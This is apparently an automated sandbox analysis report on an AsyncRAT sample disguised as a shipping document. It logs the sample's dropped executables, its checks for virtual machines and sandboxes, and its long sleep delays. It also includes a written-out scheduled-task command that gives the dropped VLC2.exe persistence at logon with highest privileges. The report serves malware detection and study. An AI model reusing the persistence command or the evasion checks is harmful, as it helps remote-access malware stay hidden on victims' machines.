                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    barindex
                    Yara detected AntiVM_3Show sources
                    Source: Yara matchFile source: 00000000.00000002.234335225.0000000003011000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Consignment Document PL&BL Draft.exe PID: 6620, type: MEMORY
                    Yara detected AsyncRATShow sources
                    Source: Yara matchFile source: 00000004.00000000.242716308.0000000000712000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.483926024.0000000000902000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.263991887.0000000002BB2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000000.271847625.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.283204276.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.266244520.0000000000902000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.263102745.0000000000712000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Isgeprf.exe PID: 6976, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Rczgwoxvqzh.exe PID: 6872, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: VLC2.exe PID: 6228, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: VLC2.exe PID: 6008, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\VLC2.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe, type: DROPPED
                    Source: Yara matchFile source: 14.0.VLC2.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.0.VLC2.exe.a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.VLC2.exe.a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.VLC2.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.Isgeprf.exe.710000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Isgeprf.exe.710000.0.unpack, type: UNPACKEDPE
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, Isgeprf.exe, VLC2.exe, 0000000E.00000002.483926024.0000000000902000.00000002.00020000.sdmp, VLC2.exe, 00000010.00000000.271847625.00000000000A2000.00000002.00020000.sdmp, Isgeprf.exe.2.drBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeCode function: 5_2_004E4BA0 sldt word ptr [eax]
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeWindow / User API: threadDelayed 452
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeWindow / User API: threadDelayed 1246
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeWindow / User API: threadDelayed 546
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeWindow / User API: threadDelayed 699
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeWindow / User API: foregroundWindowGot 832
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeWindow / User API: threadDelayed 2872
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeWindow / User API: threadDelayed 6971
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe TID: 6784Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe TID: 6624Thread sleep time: -41500s >= -30000s
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe TID: 6788Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe TID: 6824Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe TID: 6900Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exe TID: 6984Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exe TID: 6972Thread sleep time: -180000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe TID: 7048Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe TID: 6396Thread sleep time: -23058430092136925s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe TID: 6400Thread sleep count: 2872 > 30
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe TID: 6400Thread sleep count: 6971 > 30
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exe TID: 6448Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6496Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeCode function: 3_2_05290D66 GetSystemInfo,
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmpBinary or memory string: VMware
                    Source: Icda.exe, 00000003.00000002.494518000.00000000065E0000.00000002.00000001.sdmp, Isgeprf.exe, 00000004.00000002.267457724.00000000052C0000.00000002.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000002.495442454.0000000005900000.00000002.00000001.sdmp, VLC2.exe, 0000000E.00000002.494496278.0000000005730000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                    Source: Isgeprf.exe.2.drBinary or memory string: vmware
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: Fdquqwatjjr.exe, 00000005.00000003.451596278.0000000000C6F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
                    Source: Consignment Document PL&BL Draft.exe, 00000001.00000002.242325394.00000000012F3000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oy
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmpBinary or memory string: VMWARE
                    Source: Icda.exe, 00000003.00000002.486203101.00000000011FE000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllwH?
                    Source: Icda.exe, 00000003.00000002.486203101.00000000011FE000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWh
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: Icda.exe, 00000003.00000002.494518000.00000000065E0000.00000002.00000001.sdmp, Isgeprf.exe, 00000004.00000002.267457724.00000000052C0000.00000002.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000002.495442454.0000000005900000.00000002.00000001.sdmp, VLC2.exe, 0000000E.00000002.494496278.0000000005730000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                    Source: Icda.exe, 00000003.00000002.494518000.00000000065E0000.00000002.00000001.sdmp, Isgeprf.exe, 00000004.00000002.267457724.00000000052C0000.00000002.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000002.495442454.0000000005900000.00000002.00000001.sdmp, VLC2.exe, 0000000E.00000002.494496278.0000000005730000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmpBinary or memory string: VMware
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                    Source: VLC2.exe, 0000000E.00000002.486402924.00000000010F0000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`a
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
                    Source: Icda.exe, 00000003.00000002.494518000.00000000065E0000.00000002.00000001.sdmp, Isgeprf.exe, 00000004.00000002.267457724.00000000052C0000.00000002.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000002.495442454.0000000005900000.00000002.00000001.sdmp, VLC2.exe, 0000000E.00000002.494496278.0000000005730000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeMemory allocated: page read and write | page guard
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess created: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe {path}
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess created: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe 'C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe'
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeProcess created: C:\Users\user\AppData\Local\Temp\Icda.exe 'C:\Users\user\AppData\Local\Temp\Icda.exe'
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess created: C:\Users\user\AppData\Local\Temp\Isgeprf.exe 'C:\Users\user\AppData\Local\Temp\Isgeprf.exe'
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeProcess created: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe 'C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe'
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn 'VLC2' /tr ''C:\Users\user\AppData\Local\Temp\VLC2.exe'' & exit
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmpA04.tmp.bat''
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'VLC2' /tr ''C:\Users\user\AppData\Local\Temp\VLC2.exe''
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\VLC2.exe 'C:\Users\user\AppData\Local\Temp\VLC2.exe'
                    Source: Icda.exe, 00000003.00000002.486203101.00000000011FE000.00000004.00000020.sdmpBinary or memory string: GrProgram Manager
                    Source: Icda.exe, 00000003.00000002.492076127.0000000003396000.00000004.00000001.sdmpBinary or memory string: Program Manager#
                    Source: Icda.exe, 00000003.00000002.491052946.0000000003218000.00000004.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000002.488601298.00000000011B0000.00000002.00000001.sdmp, VLC2.exe, 0000000E.00000002.487373779.00000000016F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                    Source: Icda.exe, 00000003.00000002.487069083.0000000001760000.00000002.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000002.488601298.00000000011B0000.00000002.00000001.sdmp, VLC2.exe, 0000000E.00000002.487373779.00000000016F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                    Source: Icda.exe, 00000003.00000002.487069083.0000000001760000.00000002.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000002.488601298.00000000011B0000.00000002.00000001.sdmp, VLC2.exe, 0000000E.00000002.487373779.00000000016F0000.00000002.00000001.sdmpBinary or memory string: Progman
                    Source: Icda.exe, 00000003.00000002.487069083.0000000001760000.00000002.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000002.488601298.00000000011B0000.00000002.00000001.sdmp, VLC2.exe, 0000000E.00000002.487373779.00000000016F0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                    Source: Icda.exe, 00000003.00000002.491052946.0000000003218000.00000004.00000001.sdmpBinary or memory string: Program Manager
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
